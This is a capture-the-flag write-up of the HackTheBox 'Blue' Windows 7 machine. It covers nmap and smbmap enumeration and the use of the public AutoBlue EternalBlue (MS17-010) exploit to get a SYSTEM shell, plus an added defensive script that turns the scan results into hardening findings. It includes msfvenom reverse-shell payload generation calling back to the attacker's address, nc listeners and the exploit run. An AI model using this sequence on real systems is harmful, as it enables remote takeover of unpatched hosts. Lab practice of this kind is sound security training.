# HTB - Blue

![Blue](/files/-M1OKYixfOXVjedGHQsR)

## About the Box:

```bash
OS Name:        Microsoft Windows 7 Professional
OS Version:     6.1.7601 Service Pack 1 Build 7601
IP:             10.10.10.40
Arch:           x64-based PC
Difficulty:     Easy
```

## Getting Root:

1. Discovered that the SMB ports are open
2. Checked for SMB vulnerabilities and found the host vulnerable to MS17-010
3. Used a Python exploit from GitHub
4. Got a shell with SYSTEM privileges

## Nmap

**Quick scan**

```bash
# nmap 10.10.10.40

Host is up (0.045s latency).
Not shown: 991 closed ports
PORT      STATE SERVICE
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
445/tcp   open  microsoft-ds
49152/tcp open  unknown
49153/tcp open  unknown
49154/tcp open  unknown
49155/tcp open  unknown
49156/tcp open  unknown
49157/tcp open  unknown

```

Enumerating versions and running the default scripts

```bash
 # Command
 nmap -Pn -sC -sV -p 135,139,445,49152,49153,49154,49155,49156,49157 -oN Blue_nmap.txt 10.10.10.40 
 
# Results
Nmap scan report for 10.10.10.40
Host is up (0.046s latency).

PORT      STATE SERVICE      VERSION
135/tcp   open  msrpc        Microsoft Windows RPC
139/tcp   open  netbios-ssn  Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds Windows 7 Professional 7601 Service Pack 1 microsoft-ds (workgroup: WORKGROUP)  
49152/tcp open  msrpc        Microsoft Windows RPC
49153/tcp open  msrpc        Microsoft Windows RPC
49154/tcp open  msrpc        Microsoft Windows RPC
49155/tcp open  msrpc        Microsoft Windows RPC
49156/tcp open  msrpc        Microsoft Windows RPC
49157/tcp open  msrpc        Microsoft Windows RPC
Service Info: Host: HARIS-PC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 53s, deviation: 0s, median: 52s
| smb-os-discovery:
|   OS: Windows 7 Professional 7601 Service Pack 1 (Windows 7 Professional 6.1)
|   OS CPE: cpe:/o:microsoft:windows_7::sp1:professional
|   Computer name: haris-PC
|   NetBIOS computer name: HARIS-PC\x00
|   Workgroup: WORKGROUP\x00
|_  System time: 2020-01-20T17:22:24+00:00
| smb-security-mode:
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode:
|   2.02:
|_    Message signing enabled but not required
| smb2-time:
|   date: 2020-01-20T17:22:26
|_  start_date: 2020-01-19T23:53:17

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Mon Jan 20 12:21:39 2020 -- 1 IP address (1 host up) scanned in 69.89 seconds
 
```

## Nmap - smb vuln script

Nmap shows the target is vulnerable to MS17-010

```bash
root@kdeali:~/HackTheBox/Blue# nmap --script vuln -p 139,445  10.10.10.40
Starting Nmap 7.80 ( https://nmap.org ) at 2020-02-07 17:17 EST
Pre-scan script results:
| broadcast-avahi-dos:
|   Discovered hosts:
|     224.0.0.251
|   After NULL UDP avahi packet DoS (CVE-2011-1002).
|_  Hosts are all up (not vulnerable).
Nmap scan report for 10.10.10.40
Host is up (0.045s latency).

PORT    STATE SERVICE
139/tcp open  netbios-ssn
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
445/tcp open  microsoft-ds
|_clamav-exec: ERROR: Script execution failed (use -d to debug)

Host script results:
|_smb-vuln-ms10-054: false
|_smb-vuln-ms10-061: NT_STATUS_OBJECT_NAME_NOT_FOUND
| smb-vuln-ms17-010:
|   VULNERABLE:
|   Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
|     State: VULNERABLE
|     IDs:  CVE:CVE-2017-0143
|     Risk factor: HIGH
|       A critical remote code execution vulnerability exists in Microsoft SMBv1
|        servers (ms17-010).
|
|     Disclosure date: 2017-03-14
|     References:
|       https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/  
|       https://technet.microsoft.com/en-us/library/security/ms17-010.aspx
|_      https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143

Nmap done: 1 IP address (1 host up) scanned in 51.69 seconds

```
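Rather than reading the host script blocks of the two scans above by eye, they can be parsed and turned into findings. The following is an added example (not from the original writeup, nor from nmap or AutoBlue), written from the defender's side: it parses nmap's `|`-prefixed NSE output and reports what needs fixing; `Script`, `parse_host_scripts` and `assess` are names chosen for this example, and the sample input is constructed from the scan lines on this page.

```python
"""Triage nmap NSE 'Host script results' into SMB hardening findings (added example)."""
import re
from dataclasses import dataclass, field

CVE_RE = re.compile(r"CVE-\d{4}-\d{4,}")
SEVERITY_ORDER = ("CRITICAL", "HIGH", "MEDIUM")

@dataclass
class Script:
    name: str                                   # NSE script id, e.g. smb-vuln-ms17-010
    value: str = ""                             # inline value of one-line scripts
    fields: dict = field(default_factory=dict)  # nested 'key: value' lines
    text: list = field(default_factory=list)    # nested lines without a key (URLs, prose)

def parse_host_scripts(output: str) -> dict:
    """Return {script_name: Script} for every '|'-prefixed NSE block in a report."""
    scripts, current = {}, None
    for raw in output.splitlines():
        if not raw.startswith("|"):
            continue                            # port table, banner, timing lines
        body = raw[1:]
        if body[:1] in ("_", " "):              # '|_' closes a block, '| ' continues it
            body = body[1:]
        if not body.strip():
            continue                            # bare '|' spacer line
        indent = len(body) - len(body.lstrip(" "))
        line = body.strip()
        key, sep, value = line.partition(": ")  # 'https://' never splits: no space after ':'
        if not sep and line.endswith(":"):      # headers like 'VULNERABLE:' or '2.02:'
            key, value = line[:-1], ""
        elif not sep:
            key = None                          # free text
        if indent == 0 and key is not None:     # top level: a new script block
            current = Script(name=key, value=value.strip())
            scripts[key] = current
        elif current is not None and key is None:
            current.text.append(line)
        elif current is not None:
            current.fields[key.strip()] = value.strip()
    return scripts

def assess(scripts: dict) -> list:
    """Map parsed SMB script output to (severity, finding and fix) tuples."""
    findings = []
    ms17 = scripts.get("smb-vuln-ms17-010")
    if ms17 and ms17.fields.get("State") == "VULNERABLE":
        cves = ", ".join(sorted(set(CVE_RE.findall(ms17.fields.get("IDs", "")))))
        findings.append(("CRITICAL", f"SMBv1 unpatched for MS17-010 ({cves}): "
                         "install the MS17-010 update and disable SMBv1"))
    smb1 = scripts.get("smb-security-mode")
    if smb1 and smb1.fields.get("message_signing", "").startswith("disabled"):
        findings.append(("HIGH", "SMB1 message signing disabled: enforce the "
                         "'Digitally sign communications (always)' server policy"))
    smb2 = scripts.get("smb2-security-mode")
    if smb2 and any("not required" in t for t in smb2.text):
        findings.append(("HIGH", "SMB2 signing enabled but not required: "
                         "require it so sessions cannot be relayed or tampered with"))
    if smb1 and smb1.fields.get("account_used") == "guest":
        findings.append(("MEDIUM", "guest SMB session accepted: disable guest "
                         "access so unauthenticated clients cannot list shares"))
    return sorted(findings, key=lambda f: SEVERITY_ORDER.index(f[0]))

# Constructed sample: the relevant host script lines from the scans on this page.
SAMPLE = """\
| smb-security-mode:
|   account_used: guest
|   authentication_level: user
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode:
|   2.02:
|_    Message signing enabled but not required
| smb-vuln-ms17-010:
|   VULNERABLE:
|   Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
|     State: VULNERABLE
|     IDs:  CVE:CVE-2017-0143
|     Risk factor: HIGH
|
|_      https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143
"""

if __name__ == "__main__":
    for severity, finding in assess(parse_host_scripts(SAMPLE)):
        print(f"[{severity}] {finding}")
```

Running it against the full scan output of this page gives the same four findings; a host whose script reports `smb-vuln-ms17-010: false` produces none.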

## smbmap

Checking SMB shares without a username, we get nothing

```bash
root@kdeali:~/HackTheBox/Blue# smbmap -H 10.10.10.40
[+] Finding open SMB ports....
[+] User SMB session established on 10.10.10.40...
[+] IP: 10.10.10.40:445 Name: 10.10.10.40
        Disk                                                    Permissions     Comment   
        ----                                                    -----------     -------
[!] Access Denied

```

Checking SMB shares with a username specified (I used "nobody12"), we get something

```bash
root@kdeali:~/HackTheBox/Blue# smbmap -H 10.10.10.40 -u "nobody12"
[+] Finding open SMB ports....
[+] Guest SMB session established on 10.10.10.40...
[+] IP: 10.10.10.40:445 Name: 10.10.10.40
        Disk                                                    Permissions     Comment
        ----                                                    -----------     -------
        ADMIN$                                                  NO ACCESS       Remote Admin
        C$                                                      NO ACCESS       Default share  
        IPC$                                                    NO ACCESS       Remote IPC
        .
        dr--r--r--                0 Fri Jul 21 02:44:22 2017    .
        dr--r--r--                0 Fri Jul 21 02:44:22 2017    ..
        Share                                                   READ ONLY
        .
        dw--w--w--                0 Fri Jul 21 02:56:23 2017    .
        dw--w--w--                0 Fri Jul 21 02:56:23 2017    ..
        dw--w--w--                0 Fri Jul 14 18:37:45 2017    Default
        fr--r--r--              174 Fri Jul 14 18:32:23 2017    desktop.ini
        dw--w--w--                0 Fri Jul 21 02:40:38 2017    Public
        Users                                                   READ ONLY

```

The same results can be obtained by using -u " " (I prefer to specify a user)

```bash
root@kdeali:~/HackTheBox/Blue# smbmap -H 10.10.10.40 -u " "
[+] Finding open SMB ports....
[+] Guest SMB session established on 10.10.10.40...
[+] IP: 10.10.10.40:445 Name: 10.10.10.40
        Disk                                                    Permissions     Comment
        ----                                                    -----------     -------
        ADMIN$                                                  NO ACCESS       Remote Admin
        C$                                                      NO ACCESS       Default share  
        IPC$                                                    NO ACCESS       Remote IPC
        .
        dr--r--r--                0 Fri Jul 21 02:44:22 2017    .
        dr--r--r--                0 Fri Jul 21 02:44:22 2017    ..
        Share                                                   READ ONLY
        .
        dw--w--w--                0 Fri Jul 21 02:56:23 2017    .
        dw--w--w--                0 Fri Jul 21 02:56:23 2017    ..
        dw--w--w--                0 Fri Jul 14 18:37:45 2017    Default
        fr--r--r--              174 Fri Jul 14 18:32:23 2017    desktop.ini
        dw--w--w--                0 Fri Jul 21 02:40:38 2017    Public
        Users                                                   READ ONLY

```

Listing the shares recursively with -R to look for interesting files we can read.

```bash
root@kdeali:~/HackTheBox/Blue# smbmap -H 10.10.10.40 -u "nobody12" -R
[+] Finding open SMB ports....
[+] Guest SMB session established on 10.10.10.40...
[+] IP: 10.10.10.40:445 Name: 10.10.10.40
        Disk                                                    Permissions     Comment
        ----                                                    -----------     -------
        ADMIN$                                                  NO ACCESS       Remote Admin
        C$                                                      NO ACCESS       Default share
        IPC$                                                    NO ACCESS       Remote IPC
        .
        dr--r--r--                0 Fri Jul 21 02:44:22 2017    .
        dr--r--r--                0 Fri Jul 21 02:44:22 2017    ..
        Share                                                   READ ONLY
        .\
        .
        dw--w--w--                0 Fri Jul 21 02:56:23 2017    .
        dw--w--w--                0 Fri Jul 21 02:56:23 2017    ..
        dw--w--w--                0 Fri Jul 14 18:37:45 2017    Default
        fr--r--r--              174 Fri Jul 14 18:32:23 2017    desktop.ini
        dw--w--w--                0 Fri Jul 21 02:40:38 2017    Public
        Users                                                   READ ONLY
        .\
        dw--w--w--                0 Fri Jul 21 02:56:23 2017    .
        dw--w--w--                0 Fri Jul 21 02:56:23 2017    ..
        dw--w--w--                0 Fri Jul 14 18:37:45 2017    Default
        -r--r--r--              174 Fri Jul 14 18:32:23 2017    desktop.ini
        dw--w--w--                0 Fri Jul 21 02:40:38 2017    Public
        .\Default\
        dw--w--w--                0 Fri Jul 14 18:37:45 2017    .
        dw--w--w--                0 Fri Jul 14 18:37:45 2017    ..
        dr--r--r--                0 Fri Jul 14 18:37:45 2017    AppData
        dw--w--w--                0 Fri Jul 14 18:37:45 2017    Desktop
        dw--w--w--                0 Fri Jul 14 18:37:45 2017    Documents
        dw--w--w--                0 Fri Jul 14 18:37:45 2017    Downloads
        dw--w--w--                0 Fri Jul 14 18:37:45 2017    Favorites
        dw--w--w--                0 Fri Jul 14 18:37:45 2017    Links
        dw--w--w--                0 Fri Jul 14 18:37:45 2017    Music
        -r--r--r--           262144 Sun Jul 16 16:22:24 2017    NTUSER.DAT
        -r--r--r--             1024 Fri Jul 14 18:32:24 2017    NTUSER.DAT.LOG
        -r--r--r--           189440 Sun Jul 16 16:22:24 2017    NTUSER.DAT.LOG1
        -r--r--r--                0 Fri Jul 14 18:37:45 2017    NTUSER.DAT.LOG2
        -r--r--r--            65536 Fri Jul 14 18:32:24 2017    NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf
        -r--r--r--           524288 Fri Jul 14 18:32:24 2017    NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms  
        -r--r--r--           524288 Fri Jul 14 18:32:23 2017    NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms
        dw--w--w--                0 Fri Jul 14 18:37:45 2017    Pictures
        dr--r--r--                0 Fri Jul 14 18:37:45 2017    Saved Games
        dw--w--w--                0 Fri Jul 14 18:37:45 2017    Videos
        .\Default\AppData\
        dr--r--r--                0 Fri Jul 14 18:37:45 2017    .
        dr--r--r--                0 Fri Jul 14 18:37:45 2017    ..
        dr--r--r--                0 Fri Jul 14 18:37:45 2017    Local
        dr--r--r--                0 Fri Jul 14 18:37:45 2017    Roaming
        .\Default\AppData\Local\
        dr--r--r--                0 Fri Jul 14 18:37:45 2017    .
        dr--r--r--                0 Fri Jul 14 18:37:45 2017    ..
        dr--r--r--                0 Fri Jul 14 18:37:45 2017    Microsoft
        dr--r--r--                0 Fri Jul 14 18:37:45 2017    Temp
        .\Default\AppData\Local\Microsoft\
        dr--r--r--                0 Fri Jul 14 18:37:45 2017    .
        dr--r--r--                0 Fri Jul 14 18:37:45 2017    ..
        dr--r--r--                0 Fri Jul 14 18:37:45 2017    Windows
        .\Default\AppData\Local\Microsoft\Windows\
        dr--r--r--                0 Fri Jul 14 18:37:45 2017    .
        dr--r--r--                0 Fri Jul 14 18:37:45 2017    ..
        dr--r--r--                0 Fri Jul 14 18:37:45 2017    GameExplorer
        dr--r--r--                0 Fri Jul 14 18:37:45 2017    History
        dr--r--r--                0 Fri Jul 14 18:37:45 2017    Temporary Internet Files
        .\Default\AppData\Roaming\
        dr--r--r--                0 Fri Jul 14 18:37:45 2017    .
        dr--r--r--                0 Fri Jul 14 18:37:45 2017    ..
        dr--r--r--                0 Fri Jul 14 18:37:45 2017    Media Center Programs
        dr--r--r--                0 Fri Jul 14 18:37:45 2017    Microsoft
        .\Default\AppData\Roaming\Microsoft\
        dr--r--r--                0 Fri Jul 14 18:37:45 2017    .
        dr--r--r--                0 Fri Jul 14 18:37:45 2017    ..
        dr--r--r--                0 Fri Jul 14 18:37:45 2017    Internet Explorer
        dr--r--r--                0 Fri Jul 14 18:37:45 2017    Windows
        .\Default\AppData\Roaming\Microsoft\Internet Explorer\
        dr--r--r--                0 Fri Jul 14 18:37:45 2017    .
        dr--r--r--                0 Fri Jul 14 18:37:45 2017    ..
        dw--w--w--                0 Fri Jul 14 18:37:45 2017    Quick Launch
        .\Default\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\
        dw--w--w--                0 Fri Jul 14 18:37:45 2017    .
        dw--w--w--                0 Fri Jul 14 18:37:45 2017    ..
        -r--r--r--              146 Fri Jul 14 18:32:24 2017    desktop.ini
        -r--r--r--              290 Fri Jul 14 18:32:24 2017    Shows Desktop.lnk
        -r--r--r--              272 Fri Jul 14 18:32:24 2017    Window Switcher.lnk
        .\Default\AppData\Roaming\Microsoft\Windows\
        dr--r--r--                0 Fri Jul 14 18:37:45 2017    .
        dr--r--r--                0 Fri Jul 14 18:37:45 2017    ..
        dr--r--r--                0 Fri Jul 14 18:37:45 2017    Cookies
        dr--r--r--                0 Fri Jul 14 18:37:45 2017    Network Shortcuts
        dr--r--r--                0 Fri Jul 14 18:37:45 2017    Printer Shortcuts
        dw--w--w--                0 Fri Jul 14 18:37:45 2017    Recent
        dw--w--w--                0 Fri Jul 14 18:37:45 2017    SendTo
        dw--w--w--                0 Fri Jul 14 18:37:45 2017    Start Menu
        dr--r--r--                0 Fri Jul 14 18:37:45 2017    Templates
        .\Default\AppData\Roaming\Microsoft\Windows\SendTo\
        dw--w--w--                0 Fri Jul 14 18:37:45 2017    .
        dw--w--w--                0 Fri Jul 14 18:37:45 2017    ..
        -r--r--r--                3 Fri Jul 14 18:32:24 2017    Compressed (zipped) Folder.ZFSendToTarget
        -r--r--r--                7 Fri Jul 14 18:32:24 2017    Desktop (create shortcut).DeskLink
        -r--r--r--              558 Fri Jul 14 18:32:24 2017    Desktop.ini
        -r--r--r--             1238 Fri Jul 14 18:32:24 2017    Fax Recipient.lnk
        -r--r--r--                4 Fri Jul 14 18:32:24 2017    Mail Recipient.MAPIMail
        .\Default\AppData\Roaming\Microsoft\Windows\Start Menu\
        dw--w--w--                0 Fri Jul 14 18:37:45 2017    .
        dw--w--w--                0 Fri Jul 14 18:37:45 2017    ..
        dr--r--r--                0 Fri Jul 14 18:37:45 2017    Programs
        .\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\
        dr--r--r--                0 Fri Jul 14 18:37:45 2017    .
        dr--r--r--                0 Fri Jul 14 18:37:45 2017    ..
        dw--w--w--                0 Fri Jul 14 18:37:45 2017    Accessories
        dw--w--w--                0 Fri Jul 14 18:37:45 2017    Maintenance
        .\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\
        dw--w--w--                0 Fri Jul 14 18:37:45 2017    .
        dw--w--w--                0 Fri Jul 14 18:37:45 2017    ..
        dw--w--w--                0 Fri Jul 14 18:37:45 2017    Accessibility
        -r--r--r--             1280 Fri Jul 14 18:32:24 2017    Command Prompt.lnk
        -r--r--r--              678 Fri Jul 14 18:32:24 2017    Desktop.ini
        -r--r--r--             1304 Fri Jul 14 18:32:24 2017    Notepad.lnk
        -r--r--r--              262 Fri Jul 14 18:32:24 2017    Run.lnk
        dw--w--w--                0 Fri Jul 14 18:37:45 2017    System Tools
        -r--r--r--             1228 Fri Jul 14 18:32:24 2017    Windows Explorer.lnk
        .\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Accessibility\
        dw--w--w--                0 Fri Jul 14 18:37:45 2017    .
        dw--w--w--                0 Fri Jul 14 18:37:45 2017    ..
        -r--r--r--              704 Fri Jul 14 18:32:24 2017    Desktop.ini
        -r--r--r--             1358 Fri Jul 14 18:32:24 2017    Ease of Access.lnk
        -r--r--r--             1258 Fri Jul 14 18:32:24 2017    Magnify.lnk
        -r--r--r--             1262 Fri Jul 14 18:32:24 2017    Narrator.lnk
        -r--r--r--             1250 Fri Jul 14 18:32:24 2017    On-Screen Keyboard.lnk
        .\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\
        dw--w--w--                0 Fri Jul 14 18:37:45 2017    .
        dw--w--w--                0 Fri Jul 14 18:37:45 2017    ..
        -r--r--r--              262 Fri Jul 14 18:32:24 2017    computer.lnk
        -r--r--r--              262 Fri Jul 14 18:32:24 2017    Control Panel.lnk
        -r--r--r--              592 Fri Jul 14 18:32:24 2017    Desktop.ini
        -r--r--r--             1306 Fri Jul 14 18:32:24 2017    Private Character Editor.lnk
        .\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Maintenance\
        dw--w--w--                0 Fri Jul 14 18:37:45 2017    .
        dw--w--w--                0 Fri Jul 14 18:37:45 2017    ..
        -r--r--r--              318 Fri Jul 14 18:32:24 2017    Desktop.ini
        -r--r--r--              262 Fri Jul 14 18:32:24 2017    Help.lnk
        .\Public\
        dw--w--w--                0 Fri Jul 21 02:40:38 2017    .
        dw--w--w--                0 Fri Jul 21 02:40:38 2017    ..
        -r--r--r--              174 Fri Jul 21 02:40:38 2017    desktop.ini
        dw--w--w--                0 Fri Jul 21 02:40:38 2017    Documents
        dw--w--w--                0 Fri Jul 21 02:40:38 2017    Downloads
        dw--w--w--                0 Fri Jul 21 02:40:38 2017    Favorites
        dw--w--w--                0 Fri Jul 21 02:40:38 2017    Libraries
        dw--w--w--                0 Fri Jul 21 02:40:38 2017    Music
        dw--w--w--                0 Fri Jul 21 02:40:38 2017    Pictures
        dw--w--w--                0 Fri Jul 21 02:40:38 2017    Recorded TV
        dw--w--w--                0 Fri Jul 21 02:40:38 2017    Videos
        .\Public\Documents\
        dw--w--w--                0 Fri Jul 21 02:40:38 2017    .
        dw--w--w--                0 Fri Jul 21 02:40:38 2017    ..
        -r--r--r--              278 Fri Jul 21 02:40:38 2017    desktop.ini
        .\Public\Downloads\
        dw--w--w--                0 Fri Jul 21 02:40:38 2017    .
        dw--w--w--                0 Fri Jul 21 02:40:38 2017    ..
        -r--r--r--              174 Fri Jul 21 02:40:38 2017    desktop.ini
        .\Public\Libraries\
        dw--w--w--                0 Fri Jul 21 02:40:38 2017    .
        dw--w--w--                0 Fri Jul 21 02:40:38 2017    ..
        -r--r--r--               88 Fri Jul 21 02:40:38 2017    desktop.ini
        -r--r--r--              876 Fri Jul 21 02:40:38 2017    RecordedTV.library-ms
        .\Public\Music\
        dw--w--w--                0 Fri Jul 21 02:40:38 2017    .
        dw--w--w--                0 Fri Jul 21 02:40:38 2017    ..
        -r--r--r--              380 Fri Jul 21 02:40:38 2017    desktop.ini
        dw--w--w--                0 Fri Jul 21 02:40:38 2017    Sample Music
        .\Public\Music\Sample Music\
        dw--w--w--                0 Fri Jul 21 02:40:38 2017    .
        dw--w--w--                0 Fri Jul 21 02:40:38 2017    ..
        -r--r--r--              586 Fri Jul 21 02:40:38 2017    desktop.ini
        -r--r--r--          8414449 Fri Jul 21 02:40:38 2017    Kalimba.mp3
        -r--r--r--          4113874 Fri Jul 21 02:40:38 2017    Maid with the Flaxen Hair.mp3
        -r--r--r--          4842585 Fri Jul 21 02:40:38 2017    Sleep Away.mp3
        .\Public\Pictures\
        dw--w--w--                0 Fri Jul 21 02:40:38 2017    .
        dw--w--w--                0 Fri Jul 21 02:40:38 2017    ..
        -r--r--r--              380 Fri Jul 21 02:40:38 2017    desktop.ini
        dw--w--w--                0 Fri Jul 21 02:40:38 2017    Sample Pictures
        .\Public\Pictures\Sample Pictures\
        dw--w--w--                0 Fri Jul 21 02:40:38 2017    .
        dw--w--w--                0 Fri Jul 21 02:40:38 2017    ..
        -r--r--r--           879394 Fri Jul 21 02:40:38 2017    Chrysanthemum.jpg
        -r--r--r--           845941 Fri Jul 21 02:40:38 2017    Desert.jpg
        -r--r--r--             1120 Fri Jul 21 02:40:38 2017    desktop.ini
        -r--r--r--           595284 Fri Jul 21 02:40:38 2017    Hydrangeas.jpg
        -r--r--r--           775702 Fri Jul 21 02:40:38 2017    Jellyfish.jpg
        -r--r--r--           780831 Fri Jul 21 02:40:38 2017    Koala.jpg
        -r--r--r--           561276 Fri Jul 21 02:40:38 2017    Lighthouse.jpg
        -r--r--r--           777835 Fri Jul 21 02:40:38 2017    Penguins.jpg
        -r--r--r--           620888 Fri Jul 21 02:40:38 2017    Tulips.jpg
        .\Public\Recorded TV\
        dw--w--w--                0 Fri Jul 21 02:40:38 2017    .
        dw--w--w--                0 Fri Jul 21 02:40:38 2017    ..
        -r--r--r--               80 Fri Jul 21 02:40:38 2017    desktop.ini
        dw--w--w--                0 Fri Jul 21 02:40:38 2017    Sample Media
        .\Public\Recorded TV\Sample Media\
        dw--w--w--                0 Fri Jul 21 02:40:38 2017    .
        dw--w--w--                0 Fri Jul 21 02:40:38 2017    ..
        -r--r--r--              171 Fri Jul 21 02:40:38 2017    desktop.ini
        -r--r--r--          9699328 Fri Jul 21 02:40:38 2017    win7_scenic-demoshort_raw.wtv
        .\Public\Videos\
        dw--w--w--                0 Fri Jul 21 02:40:38 2017    .
        dw--w--w--                0 Fri Jul 21 02:40:38 2017    ..
        -r--r--r--              380 Fri Jul 21 02:40:38 2017    desktop.ini
        dw--w--w--                0 Fri Jul 21 02:40:38 2017    Sample Videos
        .\Public\Videos\Sample Videos\
        dw--w--w--                0 Fri Jul 21 02:40:38 2017    .
        dw--w--w--                0 Fri Jul 21 02:40:38 2017    ..
        -r--r--r--              326 Fri Jul 21 02:40:38 2017    desktop.ini
        -r--r--r--         26246026 Fri Jul 21 02:40:38 2017    Wildlife.wmv

```

## Exploiting - MS17-010 Manually

Github: <https://github.com/3ndG4me/AutoBlue-MS17-010>

Run the `shell_prep.sh` script; it compiles the kernel shellcode and generates the msfvenom payloads for x86 and x64, merging them into `sc_all.bin`

```bash
root@kdeali:/opt/AutoBlue-MS17-010/shellcode# ./shell_prep.sh
                 _.-;;-._
          '-..-'|   ||   |
          '-..-'|_.-;;-._|
          '-..-'|   ||   |
          '-..-'|_.-''-._|
Eternal Blue Windows Shellcode Compiler

Let's compile them windoos shellcodezzz

Compiling x64 kernel shellcode
Compiling x86 kernel shellcode
kernel shellcode compiled, would you like to auto generate a reverse shell with msfvenom? (Y/n)
Y
LHOST for reverse connection:
10.10.14.19
LPORT you want x64 to listen on:
8123
LPORT you want x86 to listen on:
8124
Type 0 to generate a meterpreter shell or 1 to generate a regular cmd shell
1
Type 0 to generate a staged payload or 1 to generate a stageless payload
1
Generating x64 cmd shell (stageless)...

msfvenom -p windows/x64/shell_reverse_tcp -f raw -o sc_x64_msf.bin EXITFUNC=thread LHOST=10.10.14.19 LPORT=8123    
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 460 bytes
Saved as: sc_x64_msf.bin

Generating x86 cmd shell (stageless)...

msfvenom -p windows/shell_reverse_tcp -f raw -o sc_x86_msf.bin EXITFUNC=thread LHOST=10.10.14.19 LPORT=8124
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 324 bytes
Saved as: sc_x86_msf.bin

MERGING SHELLCODE WOOOO!!!
DONE
root@kdeali:/opt/AutoBlue-MS17-010/shellcode#


# These are the files generated
root@kdeali:/opt/AutoBlue-MS17-010/shellcode# ls -l
total 80
-rw-r--r-- 1 root root 20305 Jan  8 14:39 eternalblue_kshellcode_x64.asm
-rw-r--r-- 1 root root 19862 Jan  8 14:39 eternalblue_kshellcode_x86.asm
-rw-r--r-- 1 root root  1589 Jan  8 14:39 eternalblue_sc_merge.py
-rw-r--r-- 1 root root  2203 Feb  7 17:27 sc_all.bin
-rw-r--r-- 1 root root  1232 Feb  7 17:27 sc_x64.bin
-rw-r--r-- 1 root root   772 Feb  7 17:26 sc_x64_kernel.bin
-rw-r--r-- 1 root root   460 Feb  7 17:27 sc_x64_msf.bin
-rw-r--r-- 1 root root   962 Feb  7 17:27 sc_x86.bin
-rw-r--r-- 1 root root   638 Feb  7 17:26 sc_x86_kernel.bin
-rw-r--r-- 1 root root   324 Feb  7 17:27 sc_x86_msf.bin
-rwxr-xr-x 1 root root  4556 Jan  8 14:39 shell_prep.sh


# The sc_all.bin is the file you need!!!

```

Start the listeners, one per architecture (the ports must match the LPORTs given to shell_prep.sh above: 8123 for x64, 8124 for x86)

```bash
# Port to get the shell if the target is x64
nc -lnvp 8123

# Port to get the shell if the target is x86
nc -lnvp 8124
```

Execute the exploit

```bash
# Run it without arguments to see the usage:
root@kdeali:/opt/AutoBlue-MS17-010# python eternalblue_exploit7.py
eternalblue_exploit7.py <ip> <shellcode_file> [numGroomConn]

# Execute the exploit
root@kdeali:/opt/AutoBlue-MS17-010# python eternalblue_exploit7.py 10.10.10.40 shellcode/sc_all.bin   
shellcode size: 2203
numGroomConn: 13
Target OS: Windows 7 Professional 7601 Service Pack 1
SMB1 session setup allocate nonpaged pool success
SMB1 session setup allocate nonpaged pool success
good response status: INVALID_PARAMETER
done

```

We got a shell with SYSTEM privileges

```bash
root@kdeali:~/HackTheBox/Blue# nc -lnvp 8123
listening on [any] 8123 ...
connect to [10.10.14.19] from (UNKNOWN) [10.10.10.40] 49158
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\Windows\system32>whoami
whoami
nt authority\system

C:\Windows\system32>ipconfig
ipconfig

Windows IP Configuration


Ethernet adapter Local Area Connection:

   Connection-specific DNS Suffix  . :
   IPv6 Address. . . . . . . . . . . : dead:beef::d9ea:9b4b:ca07:c644
   Temporary IPv6 Address. . . . . . : dead:beef::c1a3:4567:bd9d:edd4
   Link-local IPv6 Address . . . . . : fe80::d9ea:9b4b:ca07:c644%11
   IPv4 Address. . . . . . . . . . . : 10.10.10.40
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . : fe80::250:56ff:feb9:3982%11
                                       10.10.10.2

Tunnel adapter isatap.{CBC67B8A-5031-412C-AEA7-B3186D30360E}:

   Media State . . . . . . . . . . . : Media disconnected
   Connection-specific DNS Suffix  . :

Tunnel adapter Teredo Tunneling Pseudo-Interface:

   Media State . . . . . . . . . . . : Media disconnected
   Connection-specific DNS Suffix  . :

C:\Windows\system32>

```
